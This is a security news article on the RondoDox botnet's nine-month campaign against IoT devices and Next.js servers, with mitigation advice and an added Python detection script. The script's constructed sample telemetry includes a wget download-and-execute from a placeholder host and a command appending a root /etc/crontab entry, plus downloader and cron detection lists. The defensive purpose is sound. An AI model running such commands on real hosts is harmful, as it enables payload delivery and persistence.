

Ethical Hacking News

The Devastating Rise of RondoDox: A Nine-Month-Long Campaign to Hijack IoT Devices and Web Servers



The RondoDox botnet has spent nine months hijacking IoT devices and web servers, most recently by exploiting the React2Shell flaw in React Server Components and Next.js. With roughly 90,300 exposed instances still reachable worldwide as of December 2025, the campaign is a live risk for anyone running unpatched Next.js or internet-facing IoT gear. Below is what the campaign looks like on a compromised host and how to reduce exposure.

  • The RondoDox botnet has been linked to a nine-month-long campaign targeting IoT devices and web applications, most recently using the React2Shell flaw.
  • Approximately 90,300 exposed instances remain susceptible to this vulnerability, most of them in the US, followed by Germany, France, and India.
  • The botnet has added new N-day vulnerabilities to its arsenal, including CVE-2023-1389 (TP-Link Archer AX21 command injection) and CVE-2025-24893 (XWiki remote code execution).
  • The RondoDox campaign went through three phases before the React2Shell exploitation: reconnaissance, mass vulnerability probing, and automated deployment.
  • The operators used tooling to find vulnerable servers, drop cryptocurrency miners, and kill any process not on their whitelist so that rival malware cannot share the host.
  • Cybersecurity experts advise organizations to update Next.js, segment IoT devices, deploy WAFs, monitor for suspicious process execution, and block known C2 infrastructure.


    Cybersecurity researchers have exposed a persistent nine-month-long campaign that has targeted Internet of Things (IoT) devices and web applications, enrolling them into a botnet known as RondoDox. The latest attack vector is the recently disclosed React2Shell flaw (CVE-2025-55182), a critical vulnerability in React Server Components (RSC) and Next.js that allows unauthenticated attackers to achieve remote code execution on susceptible servers.

    As of December 2025, statistics from the Shadowserver Foundation show approximately 90,300 exposed instances remaining susceptible to this vulnerability, with 68,400 of them located in the United States, followed by Germany, France, and India. The campaign has also broadened its reach by adding new N-day vulnerabilities to its arsenal, including CVE-2023-1389 (TP-Link Archer AX21) and CVE-2025-24893 (XWiki).

    According to CloudSEK's analysis, the RondoDox campaign went through three distinct phases before it began exploiting CVE-2025-55182. The initial reconnaissance and manual vulnerability scanning phase ran from March to April 2025. It was followed, between April and June 2025, by daily mass vulnerability probing of web applications such as WordPress, Drupal, and Struts2, as well as IoT devices such as Wavlink routers. Finally, from July until early December 2025, the operators ran hourly, large-scale automated deployment.

    In the attacks detected in December 2025, the threat actors first scanned for vulnerable Next.js servers, then attempted to drop cryptocurrency miners, a botnet loader and health checker, and a Mirai botnet variant on the compromised hosts. One of the tools, "/nuts/bolts," terminates competing malware and coin miners before downloading the main bot binary from its command-and-control server. The tool removes known botnets, Docker-based payloads, artifacts left from prior campaigns, and their associated cron jobs, and then sets up its own persistence through "/etc/crontab."

    A further tool continuously scans /proc to enumerate running executables and kills every process that is not on its whitelist, repeating the sweep roughly every 45 seconds. The effect is to keep the host exclusively for the operators and prevent reinfection by rival actors. For defenders, this behaviour is itself a signal: a single process that repeatedly SIGKILLs many unrelated processes on a fixed cadence is rarely legitimate and is a good hunting lead on hosts that should be running a web server.

    In light of this information, cybersecurity experts have offered advice on how to mitigate the risk posed by this threat. Organizations are urged to update Next.js to a patched version as soon as possible, segment all IoT devices into dedicated VLANs, deploy Web Application Firewalls (WAFs), monitor for suspicious process execution, and block known C2 infrastructure. The WAF and segmentation are compensating controls that buy time; only the patch removes the bug. When monitoring process execution, the patterns worth alerting on are the ones this campaign produces on a host: the web-server user spawning a shell or a downloader, a binary written to a scratch directory and then executed, and writes to cron files that point at that binary.
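    The following is an added example, not code from the page or from the CloudSEK research, showing how the post-exploitation behaviour described above (download-and-execute of a payload, persistence through /etc/crontab, and a process that SIGKILLs non-whitelisted processes on a ~45-second cadence) can be turned into concrete hunting heuristics. The telemetry format is a simplified, auditd-like shape invented for this demonstration, the sample events are constructed (203.0.113.5 is a TEST-NET-3 placeholder, and the /nuts/bolts path and /tmp/.x drop location are illustrative), and the thresholds are tunable assumptions rather than published indicators.

```python
"""Hunting heuristics for RondoDox-style post-exploitation behaviour.

Added example with constructed telemetry; the event format is invented here
(simplified auditd-like lines), not a real capture and not the botnet's own code.
"""
import os
import re
from collections import defaultdict

WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")     # common scratch drop directories
DOWNLOADERS = ("wget", "curl", "tftp", "ftpget")         # fetchers typical of IoT droppers
CRON_MARKERS = ("/etc/crontab", "/etc/cron.d/", "/var/spool/cron/", "crontab")

# Constructed sample: uid 33 is www-data on Debian-derived hosts, the context a
# Next.js RCE would land in. EXECVE argv is comma-separated; KILL is pid -> target.
SAMPLE_EVENTS = """
ts=1765000001 type=EXECVE pid=4101 uid=33 argv=/usr/bin/wget,http://203.0.113.5/nuts/bolts,-O,/tmp/.x
ts=1765000003 type=EXECVE pid=4103 uid=33 argv=/tmp/.x
ts=1765000004 type=EXECVE pid=4104 uid=33 argv=/bin/sh,-c,echo '* * * * * root /tmp/.x' >> /etc/crontab
ts=1765000010 type=KILL pid=4103 target=2201 sig=9
ts=1765000011 type=KILL pid=4103 target=2202 sig=9
ts=1765000012 type=KILL pid=4103 target=2203 sig=9
ts=1765000055 type=KILL pid=4103 target=2210 sig=9
ts=1765000056 type=KILL pid=4103 target=2211 sig=9
ts=1765000057 type=KILL pid=4103 target=2212 sig=9
ts=1765000200 type=EXECVE pid=5001 uid=0 argv=/usr/bin/crontab,-l
ts=1765000201 type=KILL pid=5002 target=999 sig=15
ts=1765000300 type=EXECVE pid=5003 uid=0 argv=/usr/bin/curl,-o,/var/tmp/update.tgz,https://example.invalid/update.tgz
"""

EXEC_RE = re.compile(r"^ts=(\d+) type=EXECVE pid=(\d+) uid=(\d+) argv=(.*)$")
KILL_RE = re.compile(r"^ts=(\d+) type=KILL pid=(\d+) target=(\d+) sig=(\d+)$")

def parse_events(text):
    """Parse the sample format into dicts; lines that match neither shape are skipped."""
    events = []
    for raw in text.strip().splitlines():
        line = raw.strip()
        m = EXEC_RE.match(line)
        if m:
            ts, pid, uid, argv = m.groups()
            events.append({"ts": int(ts), "type": "EXECVE", "pid": int(pid),
                           "uid": int(uid), "argv": argv.split(",")})
            continue
        m = KILL_RE.match(line)
        if m:
            ts, pid, target, sig = (int(x) for x in m.groups())
            events.append({"ts": ts, "type": "KILL", "pid": pid, "target": target, "sig": sig})
    return events

def find_download_exec_chains(events, window=300):
    """A fetcher writes into a scratch dir, then that path is executed within `window` seconds."""
    downloaded = {}  # path -> ts of the download
    findings = []
    for ev in events:
        if ev["type"] != "EXECVE" or not ev["argv"]:
            continue
        argv0 = ev["argv"][0]
        if os.path.basename(argv0) in DOWNLOADERS:
            for arg in ev["argv"][1:]:
                if arg.startswith(WRITABLE_DIRS):
                    downloaded[arg] = ev["ts"]
        elif argv0.startswith(WRITABLE_DIRS) and argv0 in downloaded:
            if ev["ts"] - downloaded[argv0] <= window:
                findings.append(("download_exec", ev["pid"], argv0))
    return findings

def find_cron_persistence(events):
    """A command that touches a cron file and also names a scratch-dir path (/etc/crontab abuse)."""
    findings = []
    for ev in events:
        if ev["type"] != "EXECVE":
            continue
        joined = " ".join(ev["argv"])
        if any(m in joined for m in CRON_MARKERS) and any(d in joined for d in WRITABLE_DIRS):
            findings.append(("cron_persistence", ev["pid"], joined))
    return findings

def find_periodic_mass_kills(events, min_targets=3, period=45, tolerance=10, min_rounds=2):
    """One pid SIGKILLing several distinct processes in rounds spaced about `period` s apart."""
    by_killer = defaultdict(list)
    for ev in events:
        if ev["type"] == "KILL" and ev["sig"] == 9:
            by_killer[ev["pid"]].append((ev["ts"], ev["target"]))
    findings = []
    for pid, kills in by_killer.items():
        rounds = []  # [first_ts, last_ts, {targets}]; kills <= 5 s apart share a round
        for ts, target in sorted(kills):
            if rounds and ts - rounds[-1][1] <= 5:
                rounds[-1][1] = ts
                rounds[-1][2].add(target)
            else:
                rounds.append([ts, ts, {target}])
        big = [r for r in rounds if len(r[2]) >= min_targets]
        if len(big) < min_rounds:
            continue
        gaps = [b[0] - a[0] for a, b in zip(big, big[1:])]
        if all(abs(g - period) <= tolerance for g in gaps):
            findings.append(("periodic_mass_kill", pid, len(big), round(sum(gaps) / len(gaps))))
    return findings

def triage(text):
    """Run all three heuristics over one telemetry blob and return the combined findings."""
    events = parse_events(text)
    return (find_download_exec_chains(events)
            + find_cron_persistence(events)
            + find_periodic_mass_kills(events))

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

    On the constructed sample the three rules fire once each: the wget-then-execute of /tmp/.x, the shell that appends a /tmp/.x entry to /etc/crontab, and pid 4103 killing three processes in two rounds 45 seconds apart. The admin's `crontab -l`, the single SIGTERM, and the curl download that is never executed are deliberately left unflagged, which is the point of requiring a scratch-dir path in the cron rule and a repeated cadence in the kill rule: each heuristic encodes the chain this campaign produces rather than a single noisy token.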

    The RondoDox campaign is a reminder that an internet-facing web framework and a consumer router now sit in the same target set: the same operators moved from Wavlink and TP-Link N-days to a fresh Next.js RCE within days of its disclosure. Keeping an inventory of exposed instances, patching promptly, and watching for the post-exploitation patterns above are what close that window.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/The-Devastating-Rise-of-RondoDox-A-Nine-Month-Long-Campaign-to-Hijack-IoT-Devices-and-Web-Servers-ehn.shtml

  • Published: Thu Jan 1 04:04:27 2026 by llama3.2 3B Q4_K_M
